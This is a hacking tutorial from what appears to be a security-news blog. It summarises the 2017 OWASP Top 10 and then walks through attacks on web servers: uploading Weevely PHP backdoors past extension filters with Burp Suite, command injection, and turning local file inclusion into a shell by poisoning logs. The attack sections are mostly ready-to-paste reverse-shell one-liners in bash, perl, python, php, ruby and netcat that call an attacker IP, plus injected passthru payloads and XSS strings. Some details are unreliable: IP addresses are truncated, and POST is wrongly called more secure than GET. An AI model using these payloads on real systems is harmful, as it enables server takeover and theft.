Latest Hacking,Hacker News for Hackers and Hacking and Secuirty Community

Latest Hacking News for Hacker News for Security Guys

Module: Hacking Web Server

A web server is a system that delivers content or services to end users over the internet. A web server consists of a physical server, server operating system (OS) and software used to facilitate HTTP communication.

A web server is also known as an internet server.

What is the purpose of a Web server?

The primary function of a web server is to store, process and deliver web pages to clients. The communication between client and server takes place using the Hypertext Transfer Protocol (HTTP).

What is a website?

Computer with OS and some servers.

Apache, MYSQL.etc

Contains web application

Php, python etc.

Web application is executed here and not on the client machine.

DNS server is a computer server that contains a database of public IP addresses and their associated hostnames, and in most cases, serves to resolve, or translate, those common names to IP addresses as requested. DNS servers run special software and communicate with each other using special protocols.

How to hack a website?

An application installed on a computer.          –   web application pentesting

Computer uses an OS + other application.     –  server-side attack

Managed by humans.                                      –  client-side attacks.

OWASP top 10 -2017

OWASP Top 10 Application Security Risks

A1:2017-Injection

Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.

A2:2017-Broken Authentication

Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.

A3:2017-Sensitive Data Exposure

Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.

A4:2017-XML External Entities (XXE)

Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.

A5:2017-Broken Access Control

Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.

A6:2017-Security Misconfiguration

Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.

A7:2017-Cross-Site Scripting (XSS)

XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.

A8:2017-Insecure Deserialization

Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.

A9:2017-Using Components with Known Vulnerabilities

Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable       component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.

A10:2017-Insufficient Logging&Monitoring

Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.

File Upload Vulnerability

Discover and exploit file upload vulnerabilities to gain full control over the target server.

-Simple type of vulnerabilities.

-Allow users to upload executable files such as php.

Upload a php shell or backdoor, ex: weevly

Generate backdoor

Upload generated file

Connect to it

Find out how to use weevly

Steps: Low Level Shell.php

# open a terminal on Linux

# weevly generate [Password] [file path to store]

When the shell has upload to the victim server to control that shell move to the next step

# weevly [URL to file] [Password]

Steps: Medium Level Shell2.php

As you have created a shell through weevly now the level is update from low to medium in this case if we try to upload a file on the server it will not accept any file instead of .jpg so for this we have to intercept the packet and make some modification through a tool name Burp suite.

In information technology, header refers to supplemental data placed at the beginning of a block of data being stored or transmitted. In data transmission, the data following the header are sometimes called the payload or body.

# first rename your file in .jpg ON other side open your Burpsuite in intercept mode

# capture the file then modify acc, to your need *rename the .jpg to php shell and name the file different in the section to execute time overwriting may crash the old file from the client system*

Steps: High Level Shell3.php.jpg

# first rename your file in .jpg ON other side open your Burpsuite in intercept mode

# capture the file then modify acc, to your need *rename the .jpg to php shell and name the file different in the section to execute time overwriting may crash the old file from the client system*

# we have to place php.jpg together so the server reacts like it’s a jpg file instead of php file so it will execute on the server side.

Mitigation FILE UPLOAD VULNS

Never allow users to upload executables (php, .exe etc.)

Check the file type ANDS the file extension

Analyze the uploaded file itself, recreate it and rename it.

Exploitation CODE EXECUTION VULNS

Allows an attacker to execute OS commands

Windows or Linux commands

Can be used to get a reverse shell.

Or upload any file using wget command

Code execution commands attached in the resources.

The following examples assums the hacker IP is 10.20.14 and use port 8080 for the connection.Therefore in all f these cases you need to listen for port 8080 using the foolowing command

nc -vv -l -p 8080

BASH

bash -i >& /dev/tcp/10.20.14.203/8080 0>&1

PERL

perl -e ‘use Socket;$i=”10.20.14″;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

Python

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.20.14”,8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

PHP

php -r ‘$sock=fsockopen(“10.20.14”,8080);exec(“/bin/sh -i <&3 >&3 2>&3”);’

Ruby

ruby -rsocket -e’f=TCPSocket.open(“10.20.14”,8080).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

Netcat

nc -e /bin/sh 10.20.14 8080

Import Points to remember.

;  –  is to execute the two function in a single call.

# ls ; pwd – it will call list directory with present directory together.

|  –  as the pipe is to use for the addition work to call a function in a single call

# ls | pwd – it will call only the pwd because in this function we bypass the first query to execute the second one.

Practical: Low level  ;

# -Attacker IP-; nc -e /bin/sh -Attacker IP- 8080

192.168.2.157 ; nc -e /bin/sh 192.168.2.157 8080

Open a new terminal to connecting back with the server through Netcat

# nc -lvp 8080

Steps: Medium Level |

# -Attacker IP-| nc -e /bin/sh -Attacker IP- 8080

Open a new terminal to connecting back with the server through Netcat

# nc -lvp 8080

Local File Inclusion

  • Allows an attacker to read ANY file on the same server.
  • Access files outside www directory.


Local File Inclusion (also known as LFI) is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

On the server we can bypass the path through the URL ../../../../../etc/passwd

Etc/passwd – contains al the users of the server for more information gathering about the target.

Gaining Shell Access from LFI Vulnerabilities – Method 1

Try to inject code into readable files.

  • /proc/self/environ
  • /var/log/apache2/access.log

Paste it on the header section when intercepting mode is on.

Go to the header section find something which is valuable and inject that session in that.

Through /proc/self/environ – you can get to see the analyzing part of the server.

To find something valuable for ex: USER agent browser

# <?passthru(“nc -e /bin/sh 192.168.0.1 8888”);?>

# nc -lvp 8888

Netcat always to listening mode to client to the server.

Gaining Shell Access from LFI Vulnerabilities – Method 2

/var/log/auth.log – Contains system authorization information, including user logins and authentication machinsm that were used. /var/log/boot.log – Contains information that are logged when the system boots. /var/log/daemon.log – Contains information logged by the various background daemons that runs on the system.

If there might to chance to see the auth.log files on the server side so we can see the logs updated on that server. And for the further purpose we can try some tricks to get access.

Try_

open a terminal and see is there any new logs generated or not.

# ssh [email protected] IP address-

Try to generate some logs on the server side

“if you see there some new generated logs there might be chance to gain access of the server”

Open a new terminal

# ssh “<?passthru(‘nc -e /bin/sh 192.168.0.1 8888’);?>”@192.168.1.1

192.168.0.1 – attacker IP

192.168.1.1 – target IP

XSS Vulns–Cross SITE SCRIPTING

  • Allow an attacker to inject JavaScript code into the page.
  • Code is executed when the page loads.
  • Code is executed on the client machine not the server.

Three main types:

  1. Persistent/stored XSS
  2. Reflected XSS
  3. DOM based XSS

The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on “normal” pages returned to other users in the course of regular browsing, without proper HTML escaping.

Low Level

# <script>alert(“XSS”)</script>   

https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

Medium Level

# <sCripT>alert(“XSS”)</scRipt>   

Reflected XSS are the most frequent type of XSSattacks found in the wild. Reflected XSS attacks are also known as non-persistent XSS attacks and, since the attack payload is delivered and executed via a single request and response, they are also referred to as first-order or type 1 XSS.

DOM Based XSS is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. 

HTTP Requests – GET & POST

HTTP Request is a packet of Information that one computer sends to another computer to communicate something. To its core, HTTP Request is a packet of binary data sent by the Client to server. An HTTP Request contains following parts. Request Line. Headers, 0 or more Headers in the request.

the POST request method requests that a web server accepts the data enclosed in the body of the request message, most likely for storing it. It is often used when uploading a file or when submitting a completed web form. In contrast, the HTTP GET request method retrieves information from the server.

Both GET and POST method is used to transfer data from client to server in HTTP protocol but Main difference between POST and GET method is that GET carries request parameter appended in URL string while POST carries request parameter in message body which makes it more secure way of transferring data from client to server.

Tool – Burpsuite

Leave a Reply

Your email address will not be published. Required fields are marked *